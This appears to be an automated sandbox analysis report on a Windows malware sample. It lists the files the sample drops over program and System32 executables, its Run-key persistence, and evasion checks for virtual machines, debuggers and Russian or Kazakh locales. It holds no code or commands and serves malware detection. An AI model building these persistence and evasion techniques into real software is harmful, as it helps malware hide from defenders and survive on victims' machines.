Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

30_2_1002CBD0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\x.exe

4_2_02B0AB1C

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	22_2_007252A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	25_2_009452A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	28_2_022952A0

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 26770000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 269E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 26770000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1E800000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1ED40000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1E800000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Window / User API: threadDelayed 5124	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Window / User API: threadDelayed 4310	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 484

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
